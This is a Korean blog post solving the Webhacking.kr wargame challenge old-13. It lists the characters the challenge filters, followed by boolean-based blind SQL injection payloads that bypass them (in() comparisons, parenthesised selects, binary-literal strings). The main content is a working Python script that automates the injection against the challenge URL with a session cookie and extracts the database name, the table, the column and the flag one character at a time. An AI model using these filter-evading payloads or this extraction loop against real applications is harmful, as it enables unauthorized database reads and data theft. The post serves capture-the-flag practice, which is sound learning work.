
[Webhacking.kr] old-13

chanchand 2023. 10. 18. 00:45

문제


 

 

 

 

 

 

문제풀이


입력값이 1일 때, 0일 때, 그 외 출력결과이다.

 

blind injection으로 flag 값을 얻을 수 있다.

union, like, 공백, >, <, 0x 등의 문자가 필터링된다.

 

# db_len
if(length(database())in(db길이),1,0)

# db_name
if(ord(substr(database(),db이름인덱스,1))in(아스키코드),1,0)

# tb_len
# if((select table_name from information_schema.tables where table_schema="chall13" limit 0,1),1,0)
if(select(length(min(if((select(table_schema)from(database())),table_name,null))))from(information_schema.tables))in({tb길이},1,0)

# tb_name
if(ord((select(substr(min(if((select(table_schema)from(database())),table_name,null)),tb이름인덱스,1))from(information_schema.tables))in(아스키코드),1,0)

# col_len
# if(select column_name from information_schema.columns where table_name="flag_" limit 0,1),1,0)
if((select(length(min(if((select(table_name)in(0b01100110011011000110000101100111010111110110000101100010001101110011001100110011001101110011011000111000)),column_name,null))))from(information_schema.columns))in(col길이),1,0)

# col_name
if(ord((select(substr(min(if((select(table_name)in(0b01100110011011000110000101100111010111110110000101100010001101110011001100110011001101110011011000111000)),column_name,null)),1,1))from(information_schema.columns)))in(아스키코드),1,0)

# flag_len
if((select(length(max(flag_3a55b31d)))from(chall13.flag_ab733768))in(27),1,0)

# flag_name
if(ord((select(substr(max(flag_3a55b31d),1,1))from(chall13.flag_ab733768)))in(70),1,0)
import requests

# Boolean-based blind SQL injection solver for the old-13 write-up above.
# Every probe is an `if(<condition>,1,0)` expression sent as the `no` GET
# parameter; the response is treated as "true" when the rendered page
# contains the literal "<td>1</td>".  Each unknown value (a length, then one
# character per position) costs one request per candidate.

# cookie jar handed to every requests.get() call below
cookie={"cookie":"'PHPSESSID'='bmvg2k4nh4momseflhkh18371h'"}

# database length
# Try lengths 0..49 until the server answers "true".
for i in range(0,50):
  query="if(length(database())in({}),1,0)".format(i)
  url="https://webhacking.kr/challenge/web-10/?no={}".format(query)
  res=requests.get(url,cookies=cookie)
  if (res.text.find("<td>1</td>")!=-1):
    print("길이:{}".format(i))
    # NOTE: `len` shadows the builtin len(); it is only reused as the loop
    # bound for the name search below.
    len=i
    break

# database name
# Candidate alphabet for each character position ('F' appears twice, which
# merely costs one redundant request).
keyword="abcdefghijklmnopqrstuvwxyz0123456789ABCDEFFGHIJKLMNOPQRSTUVWXYZ"
db_name=""
# substr() positions are 1-based, hence range(1, len+1).
for i in range(1,len+1):
  for key in keyword:
    query="if(ord(substr(database(),{},1))in({}),1,0)".format(i,ord(key))
    url="https://webhacking.kr/challenge/web-10/?no={}".format(query)
    res=requests.get(url,cookies=cookie)
    if (res.text.find("<td>1</td>")!=-1):
        db_name+=key
        print(db_name)
        break

print("database:{}".format(db_name))

  
# table length
# Length of the first (min()) table name in the current schema, found via
# information_schema.tables; 0 is kept if no length in 0..49 matches.
tb_len=0
for i in range(0,50):
  query="if((select(length(min(if((select(table_schema)in(database())),table_name,null))))from(information_schema.tables))in({}),1,0)".format(i)
  url="https://webhacking.kr/challenge/web-10/?no={}".format(query)
  res=requests.get(url,cookies=cookie)
  if (res.text.find("<td>1</td>")!=-1):
    print("table 길이:{}".format(i))
    tb_len=i
    break

# table_name
# Candidate codes 48..122 cover ASCII '0' through 'z'.
tb_name=""
for i in range(1,tb_len+1):
  for j in range(48,123):
    query="if(ord((select(substr(min(if((select(table_schema)in(database())),table_name,null)),{},1))from(information_schema.tables)))in({}),1,0)".format(i,j)
    url="https://webhacking.kr/challenge/web-10/?no={}".format(query)
    res=requests.get(url,cookies=cookie)
    if (res.text.find("<td>1</td>")!=-1):
        tb_name+=chr(j)
        print(tb_name)
        break
# tb_name2 keeps the discovered name for the FROM clause further down,
# because tb_name is reassigned immediately below.
tb_name2=tb_name
print("tb_name:{}".format(tb_name))

# col_len
col_len=0
# NOTE: the value recovered above is overwritten with a hard-coded table
# name here; the two are expected to be equal for this challenge.
tb_name="flag_ab733768"
# Encode the name as a 0b... binary literal so the comparison needs no
# quoted string (see the filter list in the write-up above).
tb_name='0b'+''.join(format(ord(i),'b').zfill(8) for i in tb_name)
print(tb_name)

# Length of the first (min()) column name of that table.
for i in range(0,50):
  query="if((select(length(min(if((select(table_name)in({})),column_name,null))))from(information_schema.columns))in({}),1,0)".format(tb_name,i)
  url="https://webhacking.kr/challenge/web-10/?no={}".format(query)
  res=requests.get(url,cookies=cookie)
  if (res.text.find("<td>1</td>")!=-1):
    print("column 길이:{}".format(i))
    col_len=i
    break

# col_name
# Same position-by-position search as for the table name.
col_name=""
for i in range(1,col_len+1):
  for j in range(48,123):
    query="if(ord((select(substr(min(if((select(table_name)in({})),column_name,null)),{},1))from(information_schema.columns)))in({}),1,0)".format(tb_name,i,j)
    url="https://webhacking.kr/challenge/web-10/?no={}".format(query)
    res=requests.get(url,cookies=cookie)
    if (res.text.find("<td>1</td>")!=-1):
        col_name+=chr(j)
        print(col_name)
        break

print("col_name:{}".format(col_name))


# len
# Length of max(<column>) in <db>.<table>, using the plain (non-binary)
# table name saved in tb_name2.
flag_len=0
for i in range(0,50):
  query="if((select(length(max({})))from({}.{}))in({}),1,0)".format(col_name,db_name,tb_name2,i)
  url="https://webhacking.kr/challenge/web-10/?no={}".format(query)
  res=requests.get(url,cookies=cookie)
  if (res.text.find("<td>1</td>")!=-1):
    print("flag 길이:{}".format(i))
    flag_len=i
    break

# flag
# Final character-by-character recovery of the column value.
flag=""
for i in range(1,flag_len+1):
  for j in range(48,123):
    query="if(ord((select(substr(max({}),{},1))from({}.{})))in({}),1,0)".format(col_name,i,db_name,tb_name2,j)

    url="https://webhacking.kr/challenge/web-10/?no={}".format(query)
    res=requests.get(url,cookies=cookie)
    if (res.text.find("<td>1</td>")!=-1):
        flag+=chr(j)
        print(flag)
        break

print("flag:{}".format(flag))

str→ascii : ord()

ascii→str : chr()

limit 0,1 : 1번째부터 1개의 자료 보여줌 (0부터 시작하므로 0번째는 1)

 

